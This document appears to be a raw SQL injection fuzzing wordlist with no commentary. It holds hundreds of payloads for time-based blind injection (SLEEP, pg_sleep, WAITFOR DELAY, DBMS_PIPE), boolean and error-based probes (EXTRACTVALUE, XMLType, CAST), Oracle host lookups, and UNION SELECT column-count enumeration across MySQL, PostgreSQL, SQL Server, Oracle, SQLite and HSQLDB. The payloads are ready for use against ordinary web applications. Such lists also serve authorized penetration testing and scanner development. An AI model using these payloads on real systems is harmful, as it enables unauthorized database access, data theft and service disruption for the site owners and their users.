3847
aebgjke
'
''
"
("')(.(
;
'(
'(select*from(select(sleep(20)))a)'
'+(select*from(select(sleep(20)))a)+'
' and (select*from(select(sleep(20)))a)-- 
,(select*from(select(sleep(20)))a)
' waitfor delay'0:0:20'--
')waitfor delay'0:0:20'--
',0)waitfor delay'0:0:20'--
'||pg_sleep(20)--
' AND pg_sleep(20)--
',''||pg_sleep(20)--
')AND pg_sleep(20)--
',0)AND pg_sleep(20)--
91902336' or '8215'='8215
47235175' or '3652'='3656
15471789' or 1860=1860-- 
25124082' or 1115=1117-- 
' and '5752'='5752
' and '4483'='4484
' and 6388=6388-- 
' and 8115=8122-- 
 AND 1836=1836 -- 
 AND 1638=2267 -- 
 OR 1937=1937 -- 
 AND 1387=296 -- 
 OR 1037=1037 -- 
' AND '135'='135' -- 
' AND '13547'='2235' -- 
' OR '1367'='1367' -- 
' AND '1472'='2148' -- 
' OR '1277'='1470' -- 
 UNION ALL select NULL -- 
' UNION ALL select NULL -- 
" UNION ALL select NULL -- 
) UNION ALL select NULL -- 
') UNION ALL select NULL -- 
 / sleep(20) 
' / sleep(20) / '
" / sleep(20) / "
 and 0 in (select sleep(20) ) -- 
' and 0 in (select sleep(20) ) -- 
" and 0 in (select sleep(20) ) -- 
 where 0 in (select sleep(20) ) -- 
' where 0 in (select sleep(20) ) -- 
" where 0 in (select sleep(20) ) -- 
 or 0 in (select sleep(20) ) -- 
; select "java.lang.Thread.sleep"(20000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- 
'; select "java.lang.Thread.sleep"(20000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- 
"; select "java.lang.Thread.sleep"(20000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- 
); select "java.lang.Thread.sleep"(20000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- 
"java.lang.Thread.sleep"(20000)
 / "java.lang.Thread.sleep"(20000) 
' / "java.lang.Thread.sleep"(20000) / '
" / "java.lang.Thread.sleep"(20000) / "
 and exists ( select "java.lang.Thread.sleep"(20000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME') -- 
' and exists ( select "java.lang.Thread.sleep"(20000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME') -- 
(SELECT  UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.5') from dual)
 / (SELECT  UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.5') from dual) 
' / (SELECT  UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.5') from dual) / '
" / (SELECT  UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.5') from dual) / "
 and exists (SELECT  UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT  UTL_INADDR.get_host_name('10.0.0.5') from dual) -- 
 case when cast(pg_sleep(20.0) as varchar) > '' then 0 else 1 end
 case when cast(pg_sleep(20.0) as varchar) > '' then 0 else 1 end -- 
'case when cast(pg_sleep(20.0) as varchar) > '' then 0 else 1 end -- 
 "case when cast(pg_sleep(20.0) as varchar) > '' then 0 else 1 end -- 
 / case when cast(pg_sleep(20.0) as varchar) > '' then 0 else 1 end 
 case randomblob(100000) when not null then 1 else 1 end 
 case randomblob(1000000) when not null then 1 else 1 end 
 case randomblob(10000000) when not null then 1 else 1 end 
 case randomblob(100000000) when not null then 1 else 1 end 
 case randomblob(1000000000) when not null then 1 else 1 end 
 WAITFOR DELAY '0:0:20' -- 
' WAITFOR DELAY '0:0:20' -- 
" WAITFOR DELAY '0:0:20' -- 
) WAITFOR DELAY '0:0:20' -- 
) ' WAITFOR DELAY '0:0:20' -- 
) " WAITFOR DELAY '0:0:20' -- 
)) WAITFOR DELAY '0:0:20' -- 
)) ' WAITFOR DELAY '0:0:20' -- 
)) " WAITFOR DELAY '0:0:20' -- 
) WAITFOR DELAY '0:0:20' (
'bJlBcH<'">DNJRDs
') AND 4835=5776 AND ('aVFY'='aVFY
' AND 4998=3542 AND 'HIfa'='HIfa
) AND 8680=3941 AND (2065=2065
 AND 7669=4385
 AND 5092=1068-- ToHr
-8005
-2534') OR 1895=9087 AND ('LhHS'='LhHS
-4188') OR 5246=5246 AND ('Drdn'='Drdn
-1263' OR 7089=4619 AND 'tzbb'='tzbb
-6063' OR 5246=5246 AND 'yMHO'='yMHO
-3561) OR 2305=8552 AND (6865=6865
-1799) OR 5246=5246 AND (7906=7906
-7804 OR 4377=2382
-8463 OR 5246=5246
-5749 OR 7124=4574-- HSfI
-7959 OR 5246=5246-- ZuMt
(SELECT (CASE WHEN (2850=9938) THEN '' ELSE (SELECT 9938 UNION SELECT 2801) END))
') AND EXTRACTVALUE(7843,CONCAT(0x5c,0x716b787871,(SELECT (ELT(7843=7843,1))),0x71717a7a71)) AND ('XAXN'='XAXN
' AND EXTRACTVALUE(7843,CONCAT(0x5c,0x716b787871,(SELECT (ELT(7843=7843,1))),0x71717a7a71)) AND 'LjFe'='LjFe
) AND EXTRACTVALUE(7843,CONCAT(0x5c,0x716b787871,(SELECT (ELT(7843=7843,1))),0x71717a7a71)) AND (5717=5717
 AND EXTRACTVALUE(7843,CONCAT(0x5c,0x716b787871,(SELECT (ELT(7843=7843,1))),0x71717a7a71))
 AND EXTRACTVALUE(7843,CONCAT(0x5c,0x716b787871,(SELECT (ELT(7843=7843,1))),0x71717a7a71))-- iUwF
') OR EXTRACTVALUE(1908,CONCAT(0x5c,0x716b787871,(SELECT (ELT(1908=1908,1))),0x71717a7a71)) AND ('utGz'='utGz
' OR EXTRACTVALUE(1908,CONCAT(0x5c,0x716b787871,(SELECT (ELT(1908=1908,1))),0x71717a7a71)) AND 'GkGI'='GkGI
) OR EXTRACTVALUE(1908,CONCAT(0x5c,0x716b787871,(SELECT (ELT(1908=1908,1))),0x71717a7a71)) AND (6834=6834
 OR EXTRACTVALUE(1908,CONCAT(0x5c,0x716b787871,(SELECT (ELT(1908=1908,1))),0x71717a7a71))
 OR EXTRACTVALUE(1908,CONCAT(0x5c,0x716b787871,(SELECT (ELT(1908=1908,1))),0x71717a7a71))-- rbcj
') AND 2871=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (2871=2871) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC) AND ('loWv'='loWv
' AND 2871=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (2871=2871) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC) AND 'NTPA'='NTPA
) AND 2871=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (2871=2871) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC) AND (4230=4230
 AND 2871=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (2871=2871) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC)
 AND 2871=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (2871=2871) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC)-- uoIC
-6663') OR 5368=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5368=5368) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC) AND ('Syxo'='Syxo
-9827' OR 5368=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5368=5368) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC) AND 'QpAg'='QpAg
-5601) OR 5368=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5368=5368) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC) AND (2238=2238
-4446 OR 5368=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5368=5368) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC)
-8567 OR 5368=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (5368=5368) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)) AS NUMERIC)-- VtYw
') AND 5008 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5008=5008) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113))) AND ('AIxr'='AIxr
' AND 5008 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5008=5008) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113))) AND 'UYJa'='UYJa
) AND 5008 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5008=5008) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113))) AND (9042=9042
 AND 5008 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5008=5008) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)))
 AND 5008 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5008=5008) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)))-- GAmP
') AND 8995=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8995=8995) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ('Ayfd'='Ayfd
' AND 8995=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8995=8995) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'wLJx'='wLJx
) AND 8995=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8995=8995) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND (6332=6332
 AND 8995=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8995=8995) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)
 AND 8995=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8995=8995) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)-- BtOx
-9647') OR 9052=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9052=9052) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND ('KrTs'='KrTs
-3123' OR 9052=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9052=9052) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'qhWd'='qhWd
-2738) OR 9052=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9052=9052) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND (2867=2867
-3322 OR 9052=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9052=9052) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)
-1750 OR 9052=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9052=9052) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)-- RDZD
(SELECT CONCAT(CONCAT('qkxxq',(CASE WHEN (9197=9197) THEN '1' ELSE '0' END)),'qqzzq'))
');SELECT PG_SLEEP(20)--
';SELECT PG_SLEEP(20)--
);SELECT PG_SLEEP(20)--
;SELECT PG_SLEEP(20)--
');WAITFOR DELAY '0:0:20'--
';WAITFOR DELAY '0:0:20'--
);WAITFOR DELAY '0:0:20'--
;WAITFOR DELAY '0:0:20'--
');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(110)||CHR(72)||CHR(73),20) FROM DUAL--
';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(110)||CHR(72)||CHR(73),20) FROM DUAL--
);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(110)||CHR(72)||CHR(73),20) FROM DUAL--
;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(110)||CHR(72)||CHR(73),20) FROM DUAL--
') AND (SELECT 8653 FROM (SELECT(SLEEP(20)))vXrL) AND ('AdLA'='AdLA
' AND (SELECT 8653 FROM (SELECT(SLEEP(20)))vXrL) AND 'mKaa'='mKaa
) AND (SELECT 8653 FROM (SELECT(SLEEP(20)))vXrL) AND (7530=7530
 AND (SELECT 8653 FROM (SELECT(SLEEP(20)))vXrL)
 AND (SELECT 8653 FROM (SELECT(SLEEP(20)))vXrL)-- fypp
') OR (SELECT 4512 FROM (SELECT(SLEEP(20)))dTJV) AND ('vIiU'='vIiU
' OR (SELECT 4512 FROM (SELECT(SLEEP(20)))dTJV) AND 'qnuO'='qnuO
) OR (SELECT 4512 FROM (SELECT(SLEEP(20)))dTJV) AND (2226=2226
 OR (SELECT 4512 FROM (SELECT(SLEEP(20)))dTJV)
 OR (SELECT 4512 FROM (SELECT(SLEEP(20)))dTJV)-- nKYZ
') AND 6051=(SELECT 6051 FROM PG_SLEEP(20)) AND ('JiRv'='JiRv
' AND 6051=(SELECT 6051 FROM PG_SLEEP(20)) AND 'wpvk'='wpvk
) AND 6051=(SELECT 6051 FROM PG_SLEEP(20)) AND (4099=4099
 AND 6051=(SELECT 6051 FROM PG_SLEEP(20))
 AND 6051=(SELECT 6051 FROM PG_SLEEP(20))-- hqFd
') OR 1555=(SELECT 1555 FROM PG_SLEEP(20)) AND ('zBIa'='zBIa
' OR 1555=(SELECT 1555 FROM PG_SLEEP(20)) AND 'Vhxd'='Vhxd
) OR 1555=(SELECT 1555 FROM PG_SLEEP(20)) AND (7459=7459
 OR 1555=(SELECT 1555 FROM PG_SLEEP(20))
 OR 1555=(SELECT 1555 FROM PG_SLEEP(20))-- NrhQ
') WAITFOR DELAY '0:0:20' AND ('OPam'='OPam
' WAITFOR DELAY '0:0:20' AND 'iegh'='iegh
) WAITFOR DELAY '0:0:20' AND (8549=8549
 WAITFOR DELAY '0:0:20'
 WAITFOR DELAY '0:0:20'-- tqKc
') AND 2096=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(102)||CHR(70)||CHR(80),20) AND ('pKoQ'='pKoQ
' AND 2096=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(102)||CHR(70)||CHR(80),20) AND 'rLlT'='rLlT
) AND 2096=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(102)||CHR(70)||CHR(80),20) AND (3339=3339
 AND 2096=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(102)||CHR(70)||CHR(80),20)
 AND 2096=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(102)||CHR(70)||CHR(80),20)-- iJTn
') OR 3495=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(106)||CHR(103)||CHR(108),20) AND ('nvYm'='nvYm
' OR 3495=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(106)||CHR(103)||CHR(108),20) AND 'lmnp'='lmnp
) OR 3495=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(106)||CHR(103)||CHR(108),20) AND (7234=7234
 OR 3495=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(106)||CHR(103)||CHR(108),20)
 OR 3495=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(106)||CHR(103)||CHR(108),20)-- kPzk
') ORDER BY 1-- GKoC
') ORDER BY 1619-- qJIX
') UNION ALL SELECT NULL-- pFcK
') UNION ALL SELECT NULL,NULL-- JuWB
') UNION ALL SELECT NULL,NULL,NULL-- nnwg
') UNION ALL SELECT NULL,NULL,NULL,NULL-- IcXa
') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- VQCR
') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- hBuD
') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YtJw
') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JyON
') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- yvPg
') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uDOy
' ORDER BY 1-- roKV
' ORDER BY 8042-- tcrh
' UNION ALL SELECT NULL-- sBeG
' UNION ALL SELECT NULL,NULL-- kHWV
' UNION ALL SELECT NULL,NULL,NULL-- pfkg
' UNION ALL SELECT NULL,NULL,NULL,NULL-- GOBG
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- EaPA
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- RGcz
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- aGGe
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- fIxu
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Vkqd
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- bhzx
) ORDER BY 1-- gwzV
) ORDER BY 1882-- vFbL
) UNION ALL SELECT NULL-- eWYW
) UNION ALL SELECT NULL,NULL-- OUEJ
) UNION ALL SELECT NULL,NULL,NULL-- Dbqg
) UNION ALL SELECT NULL,NULL,NULL,NULL-- Llso
) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- BrNK
) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- azFx
) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYSL
) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZRRS
) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XffS
) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- aKJv
 ORDER BY 1-- oxpv
 ORDER BY 2228-- fpAt
 UNION ALL SELECT NULL-- rdgO
 UNION ALL SELECT NULL,NULL-- Vgdn
 UNION ALL SELECT NULL,NULL,NULL-- WSdR
 UNION ALL SELECT NULL,NULL,NULL,NULL-- JOpi
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- PdjJ
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- jPlu
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- yQLH
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jsLo
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- xKKn
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hECa
 ORDER BY 1-- vfij
 ORDER BY 6210-- Ltzc
 UNION ALL SELECT NULL-- lZUy
 UNION ALL SELECT NULL,NULL-- gBVW
 UNION ALL SELECT NULL,NULL,NULL-- VHQu
 UNION ALL SELECT NULL,NULL,NULL,NULL-- JzIZ
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- mKKV
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- PgHL
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MsQR
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- lbSJ
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jQky
 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rnuv
